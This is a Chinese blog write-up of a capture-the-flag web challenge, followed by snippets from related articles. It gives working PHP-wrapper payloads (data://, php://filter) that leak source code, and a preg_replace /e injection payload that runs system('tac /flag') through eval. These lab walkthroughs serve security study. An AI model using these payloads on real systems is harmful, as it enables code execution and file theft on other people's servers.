php伪协议与正则表达式--buuctf-[BJDCTF2020]ZJCTF,不过如此(小宇特详解)

最新推荐文章于 2024-05-20 13:57:44 发布
最新推荐文章于 2024-05-20 13:57:44 发布
阅读量32 收藏
点赞数
文章标签: php 正则表达式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_72448999/article/details/132228385
版权

读取代码,当传入的参数text中的内容为I have a dream时,才可执行下一步,include()为文件包含,利用php伪协议可构造

payload为

?text=data://text/plain,I have a dream&file=php://filter/read/convert.base64-encode/resource=next.php

 

 

将其base64解码得到next.php源码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

构造payload,这里使用了 \S*=${}

next.php?\S*=${getFlag()}&cmd=system('tac /flag');

得到flag

 

 

preg_replace/e模式可执行第二个参数的代码

preg_replace()具体用法请看下面的文章 

深入研究preg_replace与代码执行 - 先知社区

Likey308
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
buuctf-[BJDCTF2020]ZJCTF不过如此
qq_42728977的博客
12-26 2235
[BJDCTF2020]ZJCTF不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
常用正则表达式-常用正则表达式-常用正则表达式
11-01
常用正则表达式-常用正则表达式-常用正则表达式 常用正则表达式-常用正则表达式-常用正则表达式
BUUCTF- ZJCTF不过如此题目解析
2201_75327657的博客
03-29 188
发现有preg——replace说明有代码执行问题。源码中的\\1实际等于\1本身的\1有其他意思。打开查看源码查看有file说明是伪协议。preg——replace相关链接(得到base64编码解析出来为。那就利用filter查看。
buuctf-ZJCTF不过如此
m0_62094846的博客
11-21 2661
这是文件包含 ?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=&file=php://filter/read=convert.base64-encode/resource=next.php 前面一段是使用data://伪协议,后面的是读取文件信息 解码得到 这是关于preg_replace的内容 <?php $id = $_GET['id']; $_SESSION['id'] = $id; function...
BUUCTF解题十一道(04)
qq_45837896的博客
06-14 1216
文章目录[GWCTF 2019]我有一个数据库[BJDCTF2020]ZJCTF不过如此[BJDCTF2020]The mystery of ip[BJDCTF2020]Mark loves cat[安洵杯 2019]easy_web[网鼎杯 2020 朱雀组]phpweb[ASIS 2019]Unicorn shop[BJDCTF2020]Cookie is so stable[BSidesCF 2020]Had a bad day[CISCN 2019 初赛]Love Math [GWCTF 2019
“百度杯”CTF比赛 十月场GetFlag
大方子
08-22 2105
  ========================== 个人收获: 1.不要怕,多尝试 2.知道Linux web网站的默认路径 /var/www/html 3.里面有个小疑问为什么flag后面要加; (因为eval中要执行的代码也必须是完整的PHP代码,PHP是以  ;  作为一个语句的结束符的)找到的答案   ==========================   题目...
BUUCTF [BJDCTF2020]ZJCTF不过如此(正则e模式漏洞)
qq_54929891的博客
03-06 2631
进去就是一串PHP代码,代码功能是:用GET方法传入text和file两个参数的值 (file_get_contents函数代表将名字为text的文件以只读的方式打开,并且将文件内容读入到一个字符串中),如果读入的内容是I have a dream,则会输出该字符串内容并且正则表达式来匹配file参数传入的值,若匹配失败则直接GG 这个时候我们要用到伪协议data了,它可以传递文件内容也可以执行函数(函数一般要base64),这里我们传递文件内容就行了text=data://text/plain...
深入浅出解析正则表达式-替换原则
12-13
下面通过图文并茂的方式给大家介绍正则表达式替换原则,具体内容请看下文。 一、开篇  最近经常用到替换的东西所以就出来整理下,这里要分享的是正则表达式里面的替换原则,首先要声明的是这里提及到的替换原则是...
Java正则表达式-详解(附相关真题)
01-20
目录正则表达式1. 正则标记1.1 字符1.2 字符类1.3 预定义字符类1.4 边界匹配器(java一般不用到)1.5 Greedy 数量词1.6 Logical 运算符2. String类支持3. Java.util.regex包支持3.1 Pattern类(常用方法)3.2 Matcher类...
深入理解JS正则表达式---分组
10-21
下面小编就为大家带来一篇深入理解JS正则表达式---分组。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
正则表达式-NFA-DFA-min(DFA)-词法分析程序
11-21
词法分析程序的C++完整做法,文件中包括.cpp源代码,.exe应用程序,.cpp被分析的代码,.txt单词规则,.txt帮助文件。有较为详细的注释,或许有地方存在bug,供大家学习交流。
第1-63题总结:URL提交参数获取flag篇
分享简单的安全技术
05-10 3656
第一种:使用目录穿越方法,提交参数时输入:xxxx?/…/…/…/…/flag,利用?/将xxx文件失效,解析到flag所在文档,eg:第一题 第二种:使用filter协议读取文件,语句:php://filter/read=convert.base64-encode/resource=flag.php 第三种:执行ping命令时,使用|或;执行除ping命令外我们想要执行的命令 空格替换:采用$IPS$1代替空格 关键字替换,cat /flag=a=g;cat$IFS$1fla$a 第四种:利用空格绕过WA
涨姿势的web题
G0t1t的博客
07-20 821
文章目录写在前面php_rcemfw[强网杯 2019]随便注[护网杯 2018]easy_tornado[BJDCTF 2nd]fake google[BJDCTF2020]ZJCTF不过如此[GYCTF2020]Blacklist[网鼎杯 2020 青龙组]AreUSerialz 写在前面 因为自己实在是太菜,每个题都参考了其他大佬的博客,只是为了整理一下学到的新知识方便日后翻阅,有部分摘录内容,所以会在每个题的最后都会附上reference。菜鸡报道,请多指教【抱拳】 php_rce 发现是一个T
如何同步管理1000个设备的VLAN数据?
weixin_68261415的博客
05-15 732
为了方便VLAN的配置和维护,可在部门A和部门B内分别部署VCMP,管理域分别为VCMP1和VCMP2,并选择汇聚交换机AGG1作为VCMP1的Sever,接入交换机ACC1~ACC2作为VCMP1的Client,汇聚交换机AGG2作为VCMP2的Server,接入交换机ACC3~ACC4作为VCMP2的Client。这样,只需在汇聚或核心交换机上创建、删除VLAN或修改VLAN的名称、描述,同域内的接入交换机会同步修改,进而实现VLAN的集中管理,降低配置和维护的工作量。
FebHost:为什么企业需要注册保加利亚.BG域名?
05-16 372
品牌本土化战略的实施同样离不开.BG域名的助力。拥有.BG域名的企业可以显著提高其在来自保加利亚的搜索请求中的可见度和排名,吸引更多的目标访问者,提升用户参与度。在当今全球化的商业环境中,对于与保加利亚市场息息相关的企业而言,选择合适的域名至关重要。面对日益饱和的通用顶级域名市场,.BG提供了一个具有区域特色的替代选择,帮助企业在保加利亚市场中树立一个鲜明且难忘的网络形象。综上所述,对于志在保加利亚市场塑造坚实网络地位的企业、组织或个人而言,.BG域名是一个明智且具有战略意义的选择,值得业界关注和利用。
春秋云境CVE-2022-25487
2303_76653367的博客
05-15 307
Atom CMS 2.0版本存在远程代码执行漏洞,该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。
等保测评实体分享three
ddcajdkdl的博客
05-16 922
它除了检测自身的主机以外,根本不检测网络上的情况,而且对入侵行为分析的工作量将随着主机数量的增加而增加,因此全面部署主机入侵检测系统代价比较大,企业很难将所有主机用主机入侵检测系统保护,只能选择部分主机进行保护,那些未安装主机入侵检测系统的机器将成为保护的盲点,入侵者可利用这些机器达到攻击的目标。NIDS一般部署在比较重要的网段内,它不需要改变服务器等主机的配置,由于它不会在业务系统的主机中安装额外的软件,从而不会影响这些机器的CPU、I/O与磁盘等资源的使用,不会影响业务系统的性能。
PHP生成二维码+二维码包含logo图片展示
最新发布
颜夕_
05-20 73
前端你自己列表读uploads/admin/qrcode/‘.$aid.’.png这个就行。生成二维码包含logo图片(代码仅供参考,逻辑按照自己的写)用到的扩展自己安装(注:只生成二维码只要开gd扩展就行)
PHP 自提时间
qq_51110402的博客
05-14 256
【代码】PHP 自提时间。
python 正则表达式- -和
12-25
正则表达式是一种用于匹配和操作字符串的强大工具。它使用特定的语法规则来描述字符串的模式,并可以用于搜索、替换、验证和提取字符串中的特定部分。 在Python中,可以使用re模块来进行正则表达式的操作。下面是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值